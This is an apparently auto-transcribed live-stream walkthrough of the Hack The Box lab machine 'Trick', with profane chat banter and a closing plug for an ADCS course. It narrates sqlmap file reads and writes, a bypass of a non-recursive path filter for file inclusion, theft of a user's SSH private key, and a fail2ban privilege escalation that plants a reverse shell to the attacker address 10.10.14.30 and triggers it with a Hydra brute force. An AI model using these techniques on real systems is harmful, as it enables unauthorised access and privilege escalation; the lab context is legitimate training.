You're all busting. I know you're busting. Don't lie. Yeah, don't lie. Don't listen. I'm leaking it. Oh man, Daniel is going straight downtown Leroy Brown. Okay. All of chat is going downtown Leroy Brown. What the fuck is this? This is all new. I busted a long time ago. Wait, we had actual content here. Oh no, this is just a template. Well, I guess we're go-bustering. Busting. At least we're making progress now. What a roundabout way to get to... We could try and write to a file as well. We should try to write to a file as well before I forget about that. Because with the file permission, we may be able to write to the web root. If we can write to the web root, we might be able to get some stuff done. The question is, what is the web root? Var www market. Let's try writing there. Can you write a file? Is there... How do you write... Can you write a file with SQL map? Basically just doing... It's file write and file destination. I ain't afraid of no sleep. I ain't afraid of no bed. Yeah, we've got the file permission. File read. And we can do a file write. And we can just make a vim php cthulhu.php. Okay. I don't know if PHP is actually going to work, but we can try it. Okay. Okay, so now we can do SQL map. And then it's tac write file write equals Cthulhu.php and then file dest. And the file destination was going to be, we can try var www payroll and var www market. Just try dropping these in the root directory. Yes. It looks like the file has not been written. So we may not have write permissions to that directory. Yeah, 404. We can try the var www payroll as well. What are you fucking people saying? If we can read from the... We already did hunt for creds. I went looking for an SSH config. I'm not going to just... I'm not... we definitely should look for credentials in other places, but those are the most common places. I'm performing triage here. If I don't find anything else, has not been written. So it looks like we don't have access to those, to that path. Damn it. All right, so... What's on the market? Index.php. So there is PHP. Oh, we can see that here. Well, we have another page parameter, so we might as well try this. Etsy, passwd. It gives us nothing. We get nothing. We can try it with a null byte. Nope. No joy there. Maybe passwords in index.php. We certainly can look at index.php. I guess we might as well. It's a good idea. It's at least not a... It's the least bad idea in chat right now. File read. Var www market index.php. Yeah, we're busting. Wow, that was a quick one. It's doing a string replace. So it's including, and then it's replacing a ... / with nothing. Well, I guess we can't hack it then. We're done. We're all done, guys. Let's move on. It's unhackable.
I imagine.
Can't let you do that, Starbuck. Can't let you do that, Starbuck.
Yeah, this is nothing. This is nothing. It just means that instead of doing, yeah, look at you, hacker. Yeah, instead of doing this. So, for those who don't know what's happening here, what's happening is if we feed it this, it's gonna replace all of our ... / with nothing. And you might think at first glance that that's unhackable until you do something like this. Okay, so I know that's hard to see. So let's take this and let's do php-a. Let's do $str equals. We'll paste in our pathway there, and we'll do the str replace on that. .str replace. We'll just do $str equals that. And then we'll do str replace. I think you do it this way. So we're going to replace ... slash comma with nothing. So it's just empty quotes. And then $str. God damn it. That. $replace equals. Hopefully this works. I'm not very good at PHP. I'm just trying to demonstrate this. There we go. So here you can see this is our original string. I kept forgetting the semicolon is the problem. I keep thinking it's Python. So this is our original string. We put additional ... slashes in there. Okay. And then we ran str replace on it. And this is the output. A normal directory traversal string. Does that make sense? Does everyone understand what's happening? So we're removing these, but that just leaves us with more ... slashes. If you want this to be secure, you have to do it recursively, meaning you would then have to, in this script would have to be modified to then, on the output string of the str replace, do another str replace on that. And you keep doing that until you stop replacing things. You have to do this recursively to prevent this from happening. So we do have a local... I wonder if this is possible on the other subdomain as well. Like this.
This is where the fun begins.
Does that make sense? Yeah, as long as the string has ... slash run and str replace again and again. You have to do it recursively. Does that make sense? So now we have another LFI. Let's see. Which means that we can actually write a... where did we do the file write in pane 4? Yeah, here we go. So we can write the file to temp. Cthulhu.php. Looks like the file has not been written. Everyone has write permissions to temp. Rude. Yeah, it looks like it's not there. It looks like we do not have write permissions to temp. Thank you for the God bless you. Cthulhu bless. Okay, well, this is the web server. Maybe this can read Michael's SSH key if he has one. Home. Michael. There may be an SSH key. Is it EAL? It's EAL, isn't it? What was it? How can I can't remember how to spell Michael. I'm a hacker, not a spelling bee champion. It's AEL. I'm just getting word fatigue here. AEL.SSH ID RSA. Oh, big fucking brain. Oh my god, big brain. Oh, yes. You love to see it. You love to see it, chat. Okay. SSH tac I Michael at trick. We have Michael RSA. Heartbreak. Oh, permissions. Chmod. Dude, that would be a dirty fucking trick. Like, if I was making a box called Trick, I would put an ID RSA in their SSH directory and then not put the public key in the authorized keys file. Because get fucked. That would be so mean. That would be so mean. I would be so mad. I would be very mad. I would be mad at myself for doing that. All right, we're in, boys.
Hackerman.
I'm in. All right, any questions about any of that? That was a bit of a spicy box. I liked how we got there. I can't believe that guy had the file permission, and I just did not check. I mean, we checked for DBA. He didn't have it. And then I just kind of moved on. And it turns out the only permission he has is the file permission. So I just usually check for DBA and then move on. Because I've never seen a non-DBA have the file permission in a MySQL database. But I guess we learned today, didn't we? We learned today, that's for sure. You could also get RCE with log poisoning or mail poisoning. Yeah, sure, there were lots of ways you could have done it. There were certainly lots of ways. Well, we couldn't write anywhere. Like, we couldn't even write to temp. Oh my god, it did write. I mean, it created a file but didn't write it. It created a file here but didn't actually write anything to it. Do you see it's owned by MySQL? That's fucking weird. That's fucking weird. How would you do this without SQL map? You would have to do an into out file SQL query. SQL map is just doing an into out file on the back end. Previously it was via the database, so it was with database user permissions, but this time it was with... Oh, yeah, okay. So why could we read... the question I'm assuming was, why could we read the web... Why could we read it here and not from the database? That's because the database didn't have the permissions to read from that directory, but the web server does. For whatever reason. I did cheat a little bit, because if you guys remember, I've done this box before, like a long time ago. I did it with DeCroyson and the DeCroyson. Were you in there when we did this one? You're in there every week. I feel like you had to have done this one with us. Yeah, we did this one, and if you guys didn't notice at the beginning of the stream, like when I was setting up my directories and whatever, there was already a directory for Trick, and I just deleted all the files in it, so we started fresh. But I saw that one of the files was an RSA key, or was a SSH key. So I was expecting to find an SSH key at some point. So I didn't trick you. I just was expecting to. I don't remember any of this box. I don't remember any of this. I remember exactly none of this. But I can tell you that I did expect to find an SSH key at some point. Okay. That's all. Senor Goomba. Oh, I'm so glad to hear that, Senor Goomba. You've been a huge help, my guy. Thank you. I got more videos coming, and I got a whole ass course I'm making for you guys. So just be ready. Get ready for that stuff. Okay, so we're logged in to Michael. to our good friend Michael. Don't compliment him, it'll go to his head. Well, that's rude. Okay, we have user.text. Let's do sudo attack L. Well, I guess that's a quick one. Okay, this part I do remember. I at least remember broad strokes what the thing is here. I feel like I did this again recently. Didn't I? I feel like I've done this. Okay, so fail to ban has various scripts that are run upon its execution. So we can do etc. Is it etc fail to ban? And this one is owned by the security group. I wonder if we're gonna be in the security group. Do you guys? Are we gonna be in the? Let's do a prediction. Are we gonna be in the security group? Quick prediction. If I can find the browser tab, I have the dashboard open in, for fuck's sake. Quick prediction. We're gambaing. We just noticed that this one file is, for whatever reason, not owned by the root group. It's just different from all the other ones, and we see that this group has write permissions to this directory. So, are we going to be in the security group? Is the question I'm going to ask. Expired printer, football 2444, series for life. And Akra Bay Vliji. Jeez. Akra Bave Liliji. I think. I love the one of these things is not like the other game. Exactly. That's all we're playing here. We're playing the one of these things is not like the other. That's literally all it is. Yeah, I'm not going to say your name anymore. I feel like I had a stroke the first time I said it. But thank you, Akra, for your follow. So let's run groups. And we are, big shock, in the security group. If you chose no on that one, you're just setting your points on fire on that one. It's just one of these things is not like the other right there. All right, so if I remember right, I do remember this. I remember this part. Not completely. We need to find which one of these scripts are being run every time fail to ban restarts. So in sudo attack L, we see that we can restart fail to ban. But if you don't know what fail to ban is, fail to ban is an anti-brute forcing tool. Basically, it detects when your SSH or your web page is being brute forced, and it blocks those IP addresses. But it could do other stuff too. But there are certain scripts that are run upon fail to ban starting up. Fail to ban startup script. I'm guessing it's in the action.d folder. Let's just do fail to ban action.d to remember how to do this. Would fail to ban help to defend or detect password spray? Yes. We see I clicked on this one before at some point. Okay, fail to ban. Fail to ban settings. Where is this action.d file? Okay. Etsy failed to ban jail.local. I don't think we can write to that directory, unfortunately. That's all owned by root. We have to write into the Etsy. We have to write into the action.d file. So, or action.d directory. So let's look at the jail.conf. And what is it looking at? Ban action. Ban action. Is ban action in here? Let's do grep ban action. Okay. IP tables multi-port. This sets the action that will be used when the threshold is reached. This is actually a path to a file called iptablesmultiport.conf. This handles the actual IP tables firewall manipulation to ban an IP address. Well, that just sounds like a shell script. That just sounds like a privesc with extra steps. That just sounds like root with extra steps, fellas. Was it IP tables multiport? It is. IP tables multiport. What am I pressing? There we go. Grep. IP tables multiport. So I'm guessing it's this one. Nano. .conf. Okay. Is there a command that's being executed here somewhere? I don't remember what actions I took to root this last time. Command executed once at the start of fail to ban. Well, that just sounds, again, like privesc with extra steps. So we can just comment this out, I think. And we can go action start equals, and then we can make 10, 10, 14, 30. We can make a nice reverse shell for us. Because this is just a shell command. 10, 10, 14, 30. Okay. Okay. And we could just set all these other ones too. Because why not? Action stop. I'm just going to set it to all of these. And then we'll just try a bunch of stuff. Action ban. We can just like run Hydra against it to make it ban us. This is probably not necessary because it seems like action check should take care of this for us. Or not, or action start, I should say. Action check. I'm just trying to cover all my bases so I don't have to come back in here again. Action unban. Okay. All right. The directory is writable, but not the file. Oh, God. Why do I do this? Nobody... Okay, you people need to, like, be on the ball here, because you could have just, like, dove in the way and prevented me from doing any of this. Okay, hang on. Read the chat? Why would I read the chat? You're talking crazy talk right now. Okay, we're just going to copy out the uncommented out parts of this file. Okay? Because chat does not have my back.
Hey, listen!
What? Yeah, you should have done, hey, listen. That's why it's there. No one did, hey, listen. I hated this chat as soon as I joined it. Exactly. You should be full of self-loathing right now. Okay. Okay, trick. What was it called? iptables multiport.conf. Okay. Okay, let's go back over here. We can save this. Okay. wget http://10.10.14.30 iptables multiport.conf. No such file or directory. You lie. Why are there no files in this directory anymore? What did I do? Oh, I did miss action ban. Thank you. I did miss action ban. You broke it? I don't think I didn't do anything. Okay, all the shit is back again. It looks like there's some kind of script that's fucking with this. Okay. So we can come look over here. Netcat, tech anal VP. Pay no attention to that. Nothing to see there. Okay. Now we do... we do this. Sudo... Okay, we're restarting. Did we get a shell? I did not get a shell. Did the script already replace it? Yep, that's ours. So, what we can do is we can do Hydra tac L, Michael, tac P, user share word lists, rocku.text, trick.htb, SSH. Let's see if we get the... We're trying to trigger the ban action. If fail to ban tries to ban us, it should... It should give us a shell here, I think. Will you not need to change ownership of the file? I don't think so. There it is. We got it. We are root. Does that make sense? Does that make sense, fellas? Any questions about that? VoopEQ, SemTechSec, and 62Des. Thanks for the follows. How do you guys run the sound clips? They're in the channel point redemptions. There's only two of them right now. I need to add more. Tiberius is adding ones of me. I just got here. Can you do it again? Just the whole box? I don't understand how you write something with no permissions. We do have permissions. Like, if you look at... it's replaced all the files again. We do have permissions. We're in the security group. If you look at... We're in the groups. In groups. We're in a special group called security. And then this directory is owned by the security group. And the group permissions are read, write, execute. Okay? So we can go to action.d. So these files are all owned by root and not writable by us, but we can delete them because we have ownership of the directory. And we can delete them and just write, or we can overwrite them with another file that's the same name. Does that make sense? So that's all we did. The box actually has a couple of paths. You don't need the file perms. I don't remember the file perms. Again, I don't think I've ever seen a SQL injection where I didn't have DBA, but I had file permission. I don't think I've ever seen that. That'd be a very strange misconfiguration. I'm not saying those misconfigurations don't exist in the wild. They absolutely certainly do. But I've never seen a SQL injection in the wild where I did not have database administrator, but I had the file permission. There's other LFI stuff. Okay, well, there you go then. There's other stuff you could have done to get local file inclusion. But we got there in the end. Does anybody have any questions about all the stuff that we just did? All right. So I guess I'll just, since those of you who stayed the course, who watched the stream today, I'll just tell you. I guess I'll just drop it. The topic of the course I'm making is ADCS. I'm doing an entire... Anubis burned me so hard that I was like, I gotta prove that I understand all of this stuff. This is the problem. This is the pathology of my brain, okay? The pathology of my brain is that Anubis burned me so hard that I now have to make an entire course to prove that I know Active Directory certificate services. And guess what, fellas? Do you want to guess? I've exploited ADCS like 17,000 different ways now in my personal lab, trying to set all this up for you guys. Guess how many times I've run into that PA data error that I was getting on stream with the with Anubis. Just take a stab how many times. Fucking 0! 0 times! Now, I have gotten a fuckload of other Kerberos errors. We've run into all kinds of Kerberos errors, but none of the weird-ass PA data error I was getting on Anubis. Fucking cuck. That's a nice addition to CRTO. CRTO does have a really brief ADCS section now. If you have CRTO, go back and take a look at the course. The course now has ADCS stuff in it, but it's only a little bit. It only covers basically ESC1. It covers ESC1, and that's, I think, about it. I think that's pretty much it. It covers, but we're going to cover everything. I'm covering ESC1. We're covering ESC2 all through 8. We're doing an NTLM relay. We're doing, what if you have ownership permissions of the ADCS server in, how do you exploit it then? If you have, how can you use golden certificates? I know, your brain is blown. Did you say golden tickets, Al? No, I said golden certificates. Forging certificates offline and using them for authentication. We're doing all kinds of shit, dude. I'm putting together all kinds of shit for you guys, okay? It's not anywhere near done yet. I'm still working out the everything I want to show you guys. And then I'm going to make a syllabus. I'll keep you guys updated on the progress. I'm going to make a syllabus of all the modules of the course we're going to cover, and then I'll actually make them. Wake me up when it's diamond certificates. It has to be sapphire certificates or get the fuck out. You may find this AD Lab automated setup useful for this course. Yeah, let me take a look at it. Appreciate it. Thank you. Oh, this is like recent. Shit. Yeah, this could be helpful. I may try this out. Thanks a lot. I may try this out. Cool. Yeah, thank you very much. I appreciate that, Clay Hacks. I already built one from scratch, and it's working just fine for me right now. I can see your password reflected off your glasses. Then you deserve to have my password, okay? If you can read 32 randomly generated characters off of my password, off of my glasses, you deserve to have... And then you still have two-factor to contend with, okay? I mean, Patreon is paid. That's why I'm asking. I mean, you're probably going to get some teasers on Patreon, but this course is going to be a separate thing. It's going to be like, I would say on the level of like Husky's PMAT course, or any of MT Taggart's courses. It's not required content. I just don't see, there are no courses on ADCS right now. ADCS is still on the cutting edge of red teaming. So I'm building from scratch is invaluable for... Yeah, that's what I wanted to do here, because I've set up AD Labs before, but I've never set up ADCS. So I wanted to start from scratch in building the domain, and then build a certificate authority into it, because it's integrated with Active Directory. Gonna offer through TCM. We're gonna see. I'm gonna probably offer it to him, and see if he wants to like collaborate on this. Like, I'll make the course, but it may be offered through his it may get offered through his platform if he accepts. I haven't reached out to him yet. I will when when the course gets further along, when I'm further along in making it, I'll request it. Probably sometime next week. I don't have an estimated date of completion for you. I'm hoping to have it done sometime in the next month. But keep in mind that we have November 9th between now and the end of the month. So, and I'm also starting a new job, so who the fuck knows? Sounds like it's not ready yet. It's not. I didn't claim it was. I in no way claimed like it was ready. I have to make all the videos. I have to write all the content. What about your own platform? That's a lot more that I'm willing to set up. What's November 9th? Am I missing something? It's best that we don't talk about it. Because again, I'm on the verge of collapsing in on myself with hype. We could add it to your website? Yeah, we could. Yeah, we'll definitely be referring to it on the website. There's gonna be a distraction starting on November 9th and ending at some arbitrary time. All right. Who's streaming? Will your new job slow you down? Potentially. We'll see. We could do Dino Dan. Let me check InfoSec streamers. Nope, it's just me. I guess we're rating Dino Dan unless anyone's got a new InfoSec streamer I'm not aware of. Congrats on the new gig. Thanks, man. I haven't started yet. I'm gonna try and get as much of the course done as I can before the work work starts in earnest. So hopefully I can get I can at least write a lot of the content. I'm gonna have to make the videos. The videos shouldn't be too hard to make. All right, we're gonna be rating paleontologizing. Thanks for being here today, guys. We'll be back on Sunday for Fun Day Sunday. Doing the usual stuff. Maybe we'll have maybe on Sunday we'll do a little bit of preview of the course, okay? We'll do a little bit of in-depth ADCS exploitation on maybe on Sunday, maybe. If we're not feeling like doing like Try Hack Me or something like that on that day. Yeah, go to bed tonight knowing a little bit more than you did yesterday. See you guys again when the stars are right. Have a good night, day, or whatever time it is wherever you are. Stay safe. Love all of you guys.